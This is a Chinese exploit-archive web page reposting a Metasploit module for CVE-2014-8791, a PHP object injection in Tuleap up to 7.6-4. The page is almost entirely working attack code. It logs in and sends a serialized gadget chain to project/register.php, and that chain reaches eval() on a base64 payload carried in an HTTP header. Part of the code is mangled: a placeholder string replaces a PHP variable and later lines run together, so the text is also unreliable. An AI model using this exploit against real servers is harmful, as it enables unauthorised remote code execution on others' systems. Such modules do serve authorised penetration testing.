首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Tuleap PHP Unserialize Code Execution
来源:metasploit.com 作者:EgiX 发布时间:2014-12-15  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Tuleap PHP Unserialize Code Execution',
      'Description'    => %q{
        This module exploits a PHP object injection vulnerability in Tuelap <= 7.6-4 which could be
        abused to allow authenticated users to execute arbitrary code with the permissions of the
        web server. The dangerous unserialize() call exists in the 'src/www/project/register.php'
        file. The exploit abuses the destructor method from the Jabbex class in order to reach a
        call_user_func_array() call in the Jabbex class and call the fetchPostActions() method from
        the Transition_PostAction_FieldFactory class to execute PHP code through an eval() call. In
        order to work, the target must have the 'sys_create_project_in_one_step' option disabled.
      },
      'License'        => MSF_LICENSE,
      'Author'         => 'EgiX',
      'References'     =>
        [
          ['CVE', '2014-8791'],
          ['OSVDB', '115128'],
          ['URL', 'http://karmainsecurity.com/KIS-2014-13'],
          ['URL', 'https://tuleap.net/plugins/tracker/?aid=7601']
        ],
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Generic (PHP Payload)', {}]],
      'DisclosureDate' => 'Nov 27 2014',
      'DefaultTarget'  => 0))

      register_options(
      [
        OptString.new('TARGETURI', [true, "The base path to the web application", "/"]),
        OptString.new('USERNAME', [true, "The username to authenticate with" ]),
        OptString.new('PASSWORD', [true, "The password to authenticate with" ]),
        OptBool.new('SSL', [true, "Negotiate SSL for outgoing connections", true]),
        Opt::RPORT(443)
      ], self.class)
  end

  def check
    flag = rand_text_alpha(rand(10)+20)
    res = exec_php("print #{flag};")

    if res and res.body and res.body.to_s =~ /#{flag}/
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def do_login()
    print_status("#{peer} - Logging in...")

    username = datastore['USERNAME']
    password = datastore['PASSWORD']

    res = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(target_uri.path, 'account/login.php'),
      'vars_post' => {'form_loginname' => username, 'form_pw' => password}
    })

    unless res && res.code == 302
      fail_with(Failure::NoAccess, "#{peer} - Login failed with #{username}:#{password}")
    end

    print_status("#{peer} - Login successful with #{username}:#{password}")
    res.get_cookies
  end

  def exec_php(php_code)
    session_cookies = do_login()

    chain =  'O:6:"Jabbex":2:{S:15:"\00Jabbex\00handler";O:12:"EventHandler":1:{S:27:"\00EventHandler\00authenticated";b:1;}'
    chain << 'S:11:"\00Jabbex\00jab";O:6:"Jabber":3:{S:8:"_use_log";i:1;S:11:"_connection";O:5:"Chart":0:{}S:15:"_event_handlers";'
    chain << 'a:1:{S:9:"debug_log";a:2:{i:0;O:34:"Transition_PostAction_FieldFactory":1:{S:23:"\00*\00post_actions_classes";'
    chain << 'a:1:{i:0;S:52:"1;eval(base64_decode(
___FCKpd___0
SERVER[HTTP_PAYLOAD]));die;//";}}i:1;S:16:"fetchPostActions";}}}}' send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'project/register.php'), 'cookie' => session_cookies, 'vars_post' => {'data' => chain}, 'headers' => {'payload' => Rex::Text.encode_base64(php_code)} }, 3) end def exploit print_status("#{peer} - Exploiting the PHP object injection...") exec_php(payload.encoded) end end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WordPress WP Symposium 14.11 S
·Wordpress Download Manager 2.7
·Advantech AdamView 4.30.003 -
·tnftp - clientside BSD Exploit
·VFU 4.10-1.1 - Buffer Overflow
·ActualAnalyzer Cookie Command
·BulletProof FTP Client 2010 Bu
·phpMyAdmin 4.0.x, 4.1.x, 4.2.x
·Flat Calendar 1.1 HTML Injecti
·HTCSyncManager 3.1.33.0 - Serv
·Tiny Server 1.1.9 - Arbitrary
·Avira 14.0.7.342 - (avguard.ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved